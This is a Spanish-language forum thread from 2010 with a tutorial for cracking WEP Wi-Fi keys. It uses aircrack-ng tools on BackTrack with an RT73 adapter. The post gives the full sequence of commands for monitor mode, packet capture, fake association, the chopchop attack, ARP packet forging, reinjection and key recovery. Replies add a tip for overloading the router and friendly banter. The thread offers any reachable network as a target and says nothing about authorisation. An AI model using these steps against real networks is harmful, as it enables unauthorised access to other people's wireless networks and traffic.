Ataque 4:Chop Chop Backtrack+Rt73

zero · 03-feb-2010, 23:39

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin necesidad de conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela únicamente el texto plano. De cualquier modo, algunos puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el punto de acceso tira paquetes menores de 42 bytes, aireplay intenta adivinar el resto de los datos, tan pronto como el encabezado (headers) sea predecible. Si un paquete IP es capturado, automáticamente comprueba el checksum del encabezado para ver si es correcto, y despues trata de adivinar las partes que le faltan. Este ataque requiere como mínimo un paquete de datos WEP.

Bueno pasemos a la acción:
Como Backtrack trae los drivers de la Rt73 procedemos a ponerla en modo monitor para ello abrimos una shell y tecleamos:

Código:

airmon-ng start rausb0

(Si nos da algún error podemos teclear en la shell

Código:

iwconfig

para ver si nos la ha detectado,pero como ya os digo con la Rt73 no debería haber ningún problema)

Bien ahora vamos a ver las redes al alcance,para ello tecleamos:

Código:

airodump-ng rausb0

Aquí escogemos la red a crakear con cifrado wep,ahora vamos a empezar a capturar paquetes en esa red,para ello tecleamos:

Código:

airodump-ng -c (canal del AP) -b (BSSID) -w prueba rausb0

Ahora vamos a asociarnos con el AP,para ello tecleamos:

Código:

aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) rausb0

Ya estamos asociados.

Ahora lanzamos el ataque Chop Chop,para ello tecleamos:

Código:

aireplay-ng -4 -h (nuestra mac) -b (BSSID) rausb0

Nos preguntará si queremos usar ese paquete,para ello solo habrá que teclear: y

Cuando acabe tendremos un archivo .xor que ahora vamos a utilizar.

Ahora creamos una petición de paquete arp usando el archivo .xor

Código:

packetforge-ng -0 -a (BSSID) -h (nuestra mac) -k 255.255.255.255 -l 255.255.255.255 -y (nuestro archivo.xor) -w arp-request

Ahora vamos a reinyectar el paquete creado,para ello tecleamos:

Código:

aireplay-ng -2 -h (nuestra mac) -r arp-request rausb0

Nos preguntará si queremos usarlo y entonces tecleamos : y

Y empezarán a subir los paquetes,fijaos en la columna data,cuando ya tenemos suficientes,lanzaremos Aircrack.Cuando digo suficientes espero que lo entendais,dependiendo de la clave,si es de 64 o de 128 bits pues necesitareis mas o menos.

Lanzamos aircrack para obtener la clave,para ello tecleamos:

Código:

aircrack-ng -e (ESSID) -b (BSSID) prueba-02*.ivs

o creo que tambien puede valer:

Código:

aircrack-ng  prueba-02*.ivs

Si teneis mas de un millon de IVs y no ha salido podeis probar con:

Código:

aircrack-ng -y  prueba-02*.ivs

Nota:
-y : Éste es un ataque de fuerza bruta experimental único que debería ser usado cuando el método normal de ataque falle con más de un millón de IVs.

Y si todo ha salido bien tendremos la clave,sino tened paciencia,hay muchas cosas que pueden fallar la clave es tener paciencia,si van saliendo dudas o algo no está bien pues aquí estoy..
(el manual tenía muchas mas capturas de pantalla pero cuando terminé de hacerlo no me dejó subirlo al foro,me dijo que no podía usar mas de cuatro imagenes,así que he tenido que adaptarlo y cambiar algunas cosillas,espero que se entienda bien)
Saludos
Zero

hidden · 04-feb-2010, 22:38

Excelente aporte si señor necesitamos gente con ganas como tu muchas gracias genio.

Estos ataques sirven con WIFISLAX, BACK TRACK, AIRCRACK, WIFIWAY, para los que quieran probar.

zero · 04-feb-2010, 23:13

Muchas gracias hidden.
Siento no haber explicado mejor los flags utilizados y algunos pasos,pero ando muy liado,y quería abrir un hilo con el tema chop chop ya que veo que mucha gente tiene dudas y/o problemas cuando hacen ataques sin clientes conectados,y utilizan el ataque -3 (reinyección de peticion ARP).Igualmente estoy por aquí,para ayudar a resolver cualquier duda sobre este tuto.Estoy preparando algunos tutos más,haber si en unos dias los tengo listos.
Saludos

hidden · 05-feb-2010, 00:15

Seran muy pero que muy bienvenidos Zero, a mi me pasa lo mismo casi no tengo tiempo hoy tenia el dia libre y he actualizado un poco el tuto (desde cero) lo malo que cuando tengo tiempo la mujer me dice que hago mas caso a mi pc que a ella y es verdad asi que no la puedo discutir

gracias por tu ayuda.

zero · 05-feb-2010, 00:26

jajajajaja,no sabes como te entiendo,,la mia me va a echar de casa.

hidden · 05-feb-2010, 13:00

Con decirte que fumamos tabaco de liar y cada vez que quiere fumar me dice cari hazme un cigarro, y cosas por el estilo solo para despegarme del pc, incluso un dia llego a decirme o el PC o YO jajajajaja

zero · 05-feb-2010, 14:10

Yo tengo un niño con casi 2 añitos,para mi es:El niño está llorando,ve tu que yo estoy ocupada(esta´tumbada en el sofá)jajajja
Que le vamos a hacer..lo primero es lo primero.
Saludos

jiro843 · 22-feb-2010, 19:16

muy bien tu manual pero ten en cuenta que si no tienes bien la autentificacion pero bien la asociacion este metodo no funcionara ya que solo estaras monitoreando y aunque hagas el atake de chop chop no servira de nada aun que es mejor en ver de guardar tu propio archivo tengas ya uno creado para que te facilite la tarea e inyecte mas rapido y al ver que el modem eso spaquetes no los envio y se saturara la pequeña memoria del router automaticamente tronara osea se reiniciara y listo en menos de un par de minutos tendras tu clave aunque sea de 128 =) saludos

zero · 22-feb-2010, 21:17

Cita:

muy bien tu manual pero ten en cuenta que si no tienes bien la autentificacion pero bien la asociacion este metodo no funcionara ya que solo estaras monitoreando y aunque hagas el atake de chop chop no servira de nada aun que es mejor en ver de guardar tu propio archivo tengas ya uno creado para que te facilite la tarea e inyecte mas rapido y al ver que el modem eso spaquetes no los envio y se saturara la pequeña memoria del router automaticamente tronara osea se reiniciara y listo en menos de un par de minutos tendras tu clave aunque sea de 128 =) saludos

Por hacer se puede hacer de muchas maneras o no hacer de ninguna,se pueden cambiar pasos o no,es solo una de tantas formas de hacerlo.
este ataque puede fallar por muchos motivos y puede salir mejor haciendo otras cosas...pues claro.....así funciona.el que lo haga y no consiga algún paso....para eso está el foro...o mejor dicho este manual en el foro.Se podrían haber explicado variables y otros pasos pero el tiempo no está de mi parte y así tambien funciona(a veces?!)pues como todo,,esto no es una ciencia exacta.
Saludos

zero

Cita:

PD:Siento no haber explicado mejor los flags utilizados y algunos pasos,pero ando muy liado,y quería abrir un hilo con el tema chop chop ya que veo que mucha gente tiene dudas y/o problemas cuando hacen ataques sin clientes conectados,y utilizan el ataque -3 (reinyección de peticion ARP).Igualmente estoy por aquí,para ayudar a resolver cualquier duda sobre este tuto

Una cosilla más:

Cita:

pero ten en cuenta que si no tienes bien la autentificacion pero bien la asociacion este metodo no funcionara ya que solo estaras monitoreando

Este ataque puede llegar a funcionar algunas veces incluso sin autentificación
Este es un ejemplo de ataque chopchop sin autenticación. Es decir, no es necesario realizar una autenticación falsa primero y se omite la opción "h" .

Código:

aireplay-ng -4 -b 00:14:6C:7E:40:80 ath0

Esto sólo funciona con un muy limitado número de Puntos de Acceso (AP). Para los puntos de acceso que son vulnerables, sólo se enviará un paquete de desautentificación si el paquete fuente era válido. Si este es el caso, entonces un byte se ha determinado satisfactoriamente.